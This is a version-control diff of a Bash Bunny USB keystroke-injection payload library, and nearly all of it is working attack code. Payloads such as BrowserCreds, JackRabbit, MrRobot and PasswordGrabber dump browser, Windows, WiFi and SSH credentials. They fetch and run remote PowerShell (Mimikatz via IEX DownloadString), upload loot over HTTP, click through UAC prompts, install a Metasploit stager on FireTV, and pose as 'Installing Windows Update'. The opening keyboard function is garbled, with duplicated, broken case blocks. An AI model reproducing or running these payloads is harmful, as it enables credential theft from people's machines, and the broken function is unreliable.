# SETKB DONE (set the keyboard layout to the default keyboard determined by the OS language settings)
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts)
function SETKB() {
local state=$1
shift
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
case "$state" in
'START')
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
QUACK ENTER
QUACK DELAY 1500
local state=$1
shift
;;
'DONE')
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
QUACK ENTER
QUACK DELAY 1500
[[ -z "$state" ]] && exit 1 # state keyboard parameter must be given.
;;
*)
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
QUACK ENTER
QUACK DELAY 1500
case "$state" in
'START')
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;"
QUACK ENTER
QUACK DELAY 1500
;;
;;
'DONE')
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; "
QUACK ENTER
QUACK DELAY 1500
;;
*)
QUACK GUI r
QUACK DELAY 500
QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force"
QUACK ENTER
QUACK DELAY 1500
;;
esac
esac
}
export -f SETKB

15
payloads/library/Incident_Response/Hidden_Images/payload.txt
View File

@ -1,12 +1,7 @@
LED R B 100
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
DUCKY_LANG gb
LED B
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
LED G FAST
#Green means good to go
LED SETUP
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
LED ATTACK

7
payloads/library/Incident_Response/Link_File_analysis/payload.txt Normal file
View File

@ -0,0 +1,7 @@
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
LED SETUP
RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')"
LED ATTACk

0
payloads/library/Incident_Response/Link File analysis/readme.md → payloads/library/Incident_Response/Link_File_analysis/readme.md
View File

0
payloads/library/Incident_Response/Link File analysis/run.ps1 → payloads/library/Incident_Response/Link_File_analysis/run.ps1
View File

12
payloads/library/android/fireytv/payload.txt
View File

@ -11,8 +11,13 @@
# Blue Blinking ...............Running ADB command to push payload.apk
# Red Blinking.......FireTV failed to get an IP address from the Bash Bunny
# Green..............Finished
LED SETUP
GET TARGET_IP
GET SWITCH_POSITION
ATTACKMODE HID
LED R B 0
LED ATTACK
Q RIGHTARROW
Q DELAY 200
Q RIGHTARROW
@ -64,12 +69,11 @@ Q DELAY 200
Q ESCAPE
ATTACKMODE ECM_ETHERNET
LED B 2000
source bunny_helpers.sh
if [ -z "${TARGET_IP}" ]; then
LED R 2000
LED FAIL
exit 1
fi
adb connect ${TARGET_IP}
adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk
adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity"
LED G
LED FINISH

77
payloads/library/credentials/BrowserCreds/payload.txt
View File

@ -1,77 +0,0 @@
#!/bin/bash
#
# Title: BrowserCreds
# Author: illwill
# Version: 0.1
#
# Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
# then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
#script
# Blue...............Running Script
# Purple.............Got Browser Creds
LED R 200
LOOTDIR=/root/udisk/loot/BrowserCreds
mkdir -p $LOOTDIR
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
#Dump Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
#Dump Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft UserURL\, Password -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt -width 250
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
Q DELAY 2000
#Open 32bit powershell and Dump Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
Q DELAY 100
Q STRING Out-File -FilePath \$BUNNY\\loot\\BrowserCreds\\DONE
Q ENTER
Q DELAY 100
sync
LED R B 200
FILE="/root/udisk/loot/BrowserCreds/DONE"
while [ ! -e $FILE ]; do sleep 1; done;
sleep 1;
if [ -e $FILE ]; then rm -f $FILE; LED G 200; else LED R; fi

27
payloads/library/credentials/BrowserCreds/readme.md
View File

@ -1,27 +0,0 @@
# BrowserCreds
* Author: illwill
* Version: Version 0.1
* Target: Windows
## Description
Dumps the stored plaintext Browser passwords from Windows boxes using
Powershell HID attack, then stashes them in /root/udisk/loot/BrowserCreds/
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| White (blinking) | Setting up |
| Blue (blinking) | Attack running |
| Purple (blinking) | Dumping Browser Credentials |
| Green (blinking) | Succeeded Dumping Browser Credentials |
| Red (blinking) | Failed Dumping Browser Credentials |
## Discussion
https://forums.hak5.org/index.php?/topic/40431-payload-browsercreds

13
payloads/library/credentials/BruteBunny/payload.txt
View File

@ -5,15 +5,14 @@
# Version: 1.0
# Category: Password Recovery
# Target: Windows XP SP3+
#
#
# Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain
# access to the admin panel.
# init
LED R B
LED SETUP
# need SWITCH_POSITION, so give it to me. please. thank you.
source bunny_helpers.sh
GET SWITCH_POSITION
# set up the things to make it do stuff
mkdir -p /root/udisk/BruteBunny/loot
@ -28,12 +27,12 @@ sync;sleep 1;sync
ATTACKMODE HID STORAGE
# wait for storage
LED R G B 100
LED STAGE1
QUACK DELAY 6000
QUACK GUI r
QUACK DELAY 100
# unleash the brute bunny
LED B 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
QUACK ENTER
sleep 10
@ -41,4 +40,4 @@ sleep 10
# sync the stuff
sync;sleep 1;sync
LED G
LED FINISH

58
payloads/library/credentials/DumpCreds/payload.txt
View File

@ -6,23 +6,23 @@
# Build: 1004
# Category: Exfiltration
# Target: Windows Windows 10 (Powershell)
# Attackmodes: HID, Ethernet
# Attackmodes: HID, Ethernet
# !!! works only with Bash Bunny FW 1.1 and up !!!
#
#
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
#
#
# LED Status
# ----------------------- + --------------------------------------------
# SETUP + Setup
# FAIL + No /tools/impacket/examples/smbserver.py found
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------
# FAIL2 + Target did not acquire IP address
# Yellow single blink + Initialization
# Yellow double blink + HID Stage
# Yellow triple blink + Wait for IP coming up
# Cyan inv single blink + Wait for Handshake (SMBServer Coming up)
# Cyan inv quint blink + Powershell scripts running
# White fast blink + Cleanup, copy Files to <root>/loot
# Green + Finished
# ----------------------- + --------------------------------------------
logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################"
@ -30,6 +30,7 @@ logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #
###### Lets Start ####
LED SETUP
GET SWITCH_POSITION
# Some Variables
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
@ -39,13 +40,13 @@ LOOTDIR=$SWITCHDIR/loot
if [ -f $SWITCHDIR/DEBUG ];then
DEBUG=1 # 1= Debug on / 0= Debug off
tail -f /var/log/syslog > /tmp/log.txt &
else
else
DEBUG=0
fi
mkdir -p $LOOTDIR
mkdir -p $LOOTDIR
REQUIRETOOL impacket
REQUIRETOOL impacket
# remove old Handshake Files
rm -f $SWITCHDIR/CON_*
@ -60,8 +61,8 @@ Q DELAY 5000
# Launch initial cmd
if [ $DEBUG -eq 1 ]; then
RUN WIN cmd
else
RUN WIN cmd
else
RUN WIN cmd /k mode con lines=1 cols=100
fi
@ -69,7 +70,7 @@ fi
Q DELAY 1000
if [ $DEBUG -eq 1 ]; then
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs"
else
else
Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs"
fi
Q DELAY 500
@ -77,12 +78,12 @@ Q ENTER
# Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel)
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows.
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
# the second powershell command goes to the cmd Windows I open first.
# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline
# now the second powershell command goes to the admin cmd windows.
# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt.
# the second powershell command goes to the cmd Windows I open first.
Q DELAY 1000
Q ALT j
Q DELAY 500
@ -109,7 +110,6 @@ logger -t DumpCred_2.1 "### Enter Ethernet Stage ###"
# Ethernet Tage
LED STAGE3
ATTACKMODE RNDIS_ETHERNET
# Source bunny_helpers.sh to get environment variables
logger -t DumpCred_2.1 "### Start SMBServer ###"
# Start SMB Server
@ -149,7 +149,7 @@ logger -t DumpCred_2.1 "### cleanup and copy files ###"
if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then
mkdir -p /root/udisk/loot/DumpCred_2.1
fi
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1
rmdir $LOOTDIR
rm -f $SWITCHDIR/CON_EOF
@ -163,4 +163,4 @@ fi
ATTACKMODE RNDIS_ETHERNET STORAGE
sync; sleep 1; sync
LED FINISH
LED FINISH

162
payloads/library/credentials/JackRabbit/payload.txt
View File

@ -1,162 +0,0 @@
#!/bin/bash
#
# Title: JackRabbit
# Author: illwill
# Version: 0.1
#
# Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a
# Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
#
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire Get-FoxDump.ps1
# https://github.com/fireeye/SessionGopher SessionGopher .ps1
# https://github.com/gentilkiwi/mimikatz md.ps1 from gentilkiwi/clymb3r/mattifestation obfuscated to mimidogz
#script
# Purple...............Jackin dat loot
# Green................Jacked dat loot
# Red Blue.............PoPo caught yo ass
LED R B 200
LOOTDIR=/root/udisk/loot/JackRabbit
mkdir -p $LOOTDIR
ATTACKMODE HID STORAGE
LED B 200
# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
# Make the loot folder of the computername
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
Q STRING md \$LOOTDIR2
Q ENTER
Q DELAY 100
# Jackin' Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \|
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$LOOTDIR2\\IE-Edge.txt
Q ENTER
Q DELAY 100
# Jackin' Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File \$LOOTDIR2\\Chrome.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
# Open 32bit powershell and Jackin' Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File \$LOOTDIR2\\FireFox.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
# UAC Bypass
Q GUI r
Q STRING powershell -c "Start-Process powershell -verb runas"
Q ENTER
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
Q ENTER
Q DELAY 100
# Jackin' Windows creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nP5aQv\'\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt
Q DELAY 300
Q ENTER
# Jackin' Wifi creds
Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \|
Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \|
Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \|
Q STRING Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt
Q ENTER
Q DELAY 100
# Jackin' SSH Creds
# change to "Invoke-SessionGopher -Thorough" if you want to search for PuTTY private key (.ppk), Remote Desktop (.rdp), and RSA token (.sdtid) files, to extract private key and session information.
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nrfTPI\'\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt
Q ENTER
Q DELAY 100
# Jackin' dem install configs
Q STRING \$F \= @\(\)\;\$F \+\= \"C:\\sysprep.inf\"\;\$F \+\= \"C:\\sysprep\\sysprep.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattend\\Unattended.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattended.xml\"\;
Q STRING \$i \= 0\; foreach\(\$file in \$F\) \{if \(Test-Path \$file\)\{cp \$file \$LOOTDIR2\;\$i\+\+\}\}
Q ENTER
Q DELAY 100
# Output DONE to root of USB file to let bashbunny we're all good in the hood
Q DELAY 100
Q STRING Out-File -FilePath \$BUNNY\\loot\\DONE
Q ENTER
Q DELAY 100
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
Q ENTER
Q DELAY 1000
# GTFO
Q STRING EXIT
Q ENTER
#Sync Drive
sync
FILE="/root/udisk/loot/DONE"
while [ ! -e $FILE ]; do sleep 1; done;
sleep 1;
if [ -e $FILE ]; then rm -f $FILE; LED G 200
else LED R;
for (( ; ; ))
do
LED R;
sleep 1;
LED B;
sleep 1;
done
fi

25
payloads/library/credentials/JackRabbit/readme.md
View File

@ -1,25 +0,0 @@
# JackRabbit
* Author: illwill
* Version: Version 0.1
* Target: Windows
## Description
Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a
Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Purple (blinking) | Jackin dat loot |
| Green (blinking) | Jacked dat loot |
| RED BLUE(blinking) | PoPo caught yo ass |
## Discussion

2683
payloads/library/credentials/MrRobot/md.ps1
View File

File diff suppressed because one or more lines are too long

4
payloads/library/credentials/MrRobot/p.ps1
View File

@ -1,4 +0,0 @@
IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');$o = Invoke-Mimidogz -DumpCred
(New-Object Net.WebClient).UploadString('http://172.16.64.1/'+$env:computername, $o)
(New-Object Net.WebClient).UploadString('http://172.16.64.1/EOF', 'EOF');
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

70
payloads/library/credentials/MrRobot/payload.txt
View File

@ -1,70 +0,0 @@
#!/bin/bash
#
# Title: MrRobot Mimikatz Attack
# Author: illwill, El3ct71k
# Version: 0.2
#
# Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
# with Mimikatz then stashes them in /root/udisk/loot/MrRobot
#
# Purple......................Setup
# Yellow single blink.........Running Powershell / Waiting for WebServer to start
# Yellow double blink.........Waiting for server connection and uploading results
# Cyan inverted single blink..Starts ethenet attack
# Cyan inverted double blink..Starts server to gets results
# Green..............Got Creds and copied to loot folder
# Red................No Creds
LED SETUP
# Creating Loot Folders
LOOTDIR=/root/udisk/loot/MrRobot
mkdir -p $LOOTDIR
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
mkdir -p $SWITCHDIR/loot
# HID Attack Starts
ATTACKMODE HID
# UAC Bypass
LED STAGE1
RUN WIN powershell -c "Start-Process cmd -verb runas"
Q DELAY 250
Q ENTER
Q DELAY 1500
Q LEFTARROW
Q DELAY 500
Q ENTER
Q DELAY 1500
LED STAGE2
#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
Q DELAY 300
Q ENTER
# Ethernet Attack Starts
ATTACKMODE RNDIS_ETHERNET
LED SPECIAL1
# mount -o sync /dev/nandf /root/udisk
iptables -A OUTPUT -p udp --dport 53 -j DROP
python $SWITCHDIR/server.py
#Wait for EOF in loot folder
LED SPECIAL2
while [ ! -e "$SWITCHDIR/loot/EOF" ]; do sleep 1; done;
sleep 1
# check for empty lootddd directory, then check results and move them to loot
if [ "$(ls -A $SWITCHDIR/loot/)" ]; then
if grep -q "ERROR kuhl_m_sekurlsa_acquireLSA" $SWITCHDIR/loot/*.txt; then
LED FAIL
mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
rm -rf $SWITCHDIR/loot/
else
mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
rm -rf $SWITCHDIR/loot/
LED FINISH
fi
else
rm -rf $SWITCHDIR/loot/
LED FAIL
fi

28
payloads/library/credentials/MrRobot/readme.md
View File

@ -1,28 +0,0 @@
# MrRobot
![alt tag](http://i.imgur.com/eunFr0U.jpg)
* Author: illwill & tuxxy
* Version: Version 0.2
* Target: Windows
## Description
Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
with Mimikatz then stashes them in /root/udisk/loot/MrRobot
## Configuration
None needed.
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Blue (blinking) | Running Powershell / Waiting for WebServer |
| White (blinking) | WebServer started and Uploading Results |
| Purple (blinking) | DChecking for Results |
| Green | Got Creds and copied to loot folder |
| Amber (blinking) | MimiKatz failed (Not Admin?) |
| Red (blinking) | No Creds / Mimikatz failed |
## Discussion
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40524-payload-mrrobot/ "Hak5 Forum Thread")

28
payloads/library/credentials/PasswordGrabber/e.cmd
View File

@ -1,34 +1,20 @@
@echo off
@echo Installing Windows Update
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul
if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
REM This executes LaZagne in the current directory and outputs the password file to Loot
%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)
REM Blink CAPSLOCK key

19
payloads/library/credentials/PasswordGrabber/payload.txt
View File

@ -1,17 +1,18 @@
#!/bin/bash
#
# Title: USB Exfiltrator
# Author: Hak5Darren
# Version: 1.1
# Target: Windows XP SP3+
# Props: Diggster, IMcPwn
# Category: Exfiltration
#
# Title: Password Grabber
# Author: Razerblade
# Version: 1.2
# Target: Windows
# Props: Hak5Darren, TeCHemically, dragmus31
# Category: Credentials
#
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
# which in turn executes e.cmd invisibly using i.vbs
# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
# which in turn steals credentials by using LaZagne and saves them to /Loot
#
LED SETUP
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"

26
payloads/library/credentials/PasswordGrabber/readme.md
View File

@ -1,25 +1,33 @@
# PasswordGrabber
* Author: RazerBlade
* Creds: Hak5Darren, AlessandroZ
* Version: Version 1.1
* Firmware support: 1.1
* Target: Windows
* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31
* Version: Version 1.2
* Firmware support: 1.1+
* Target: Windows 7+
## Description
Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
Full read here: https://github.com/AlessandroZ/LaZagne
Downloads here: https://github.com/AlessandroZ/LaZagne/releases
## Configuration
1. You need to download the latest file from LaZagnes release page.
2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe
3. Plug it in a computer and PWN them.
Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
## INFO
By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy
Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne
When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go!
## DISCLAIMER
Hak5 is not responsible for the execution of 3rd party binaries.
## STATUS
| LED | Status |
@ -28,5 +36,5 @@ When compiled or downloaded, just drop it of to the PasswordGrabbers folder and
| Green | Attack Complete |
## Discussion
[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/

2
payloads/library/credentials/SudoBackdoor/cleaner/payload.txt
View File

@ -24,8 +24,6 @@ else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP

2
payloads/library/credentials/SudoBackdoor/injector/payload.txt
View File

@ -26,8 +26,6 @@ else
ATTACKMODE ECM_ETHERNET HID
fi
DUCKY_LANG us
GET SWITCH_POSITION
GET HOST_IP

62
payloads/library/credentials/WiFiCreds/payload.txt
View File

@ -1,62 +0,0 @@
#!/bin/bash
#
# Title: WiFiCreds
# Author: illwill
# Version: 0.3
#
# Dumps the stored plaintext Wifi SSID & passwords from Windows boxes using Powershell
# then stashes them in /root/udisk/loot/WiFiCreds
#
# Blue...............Running Powershell HID Script
# Purple.............Getting WiFi Creds
# Green..............Got WiFi Creds
# Red................Didn't Get WiFi Creds
LED R 200
mkdir -p /root/udisk/loot/WiFiCreds
rm -f /root/udisk/loot/WiFiCreds/DONE
ATTACKMODE HID STORAGE
LED B 200
Q GUI
Q DELAY 500
Q STRING POWERSHELL
Q DELAY 1000
Q CTRL-SHIFT ENTER
Q DELAY 2000
Q LEFTARROW
Q DELAY 100
Q ENTER
Q DELAY 1200
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
LED R B 200
Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \|
Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \|
Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \|
Q STRING Format-Table -AutoSize \| Out-File \$Bunny\\loot\\WiFiCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING Out-File -FilePath \$BUNNY\\loot\\WifiCreds\\DONE
Q ENTER
Q DELAY 100
# Eject the USB Safely
Q STRING \$Eject \= New-Object -comObject Shell.Application
Q ENTER
Q DELAY 100
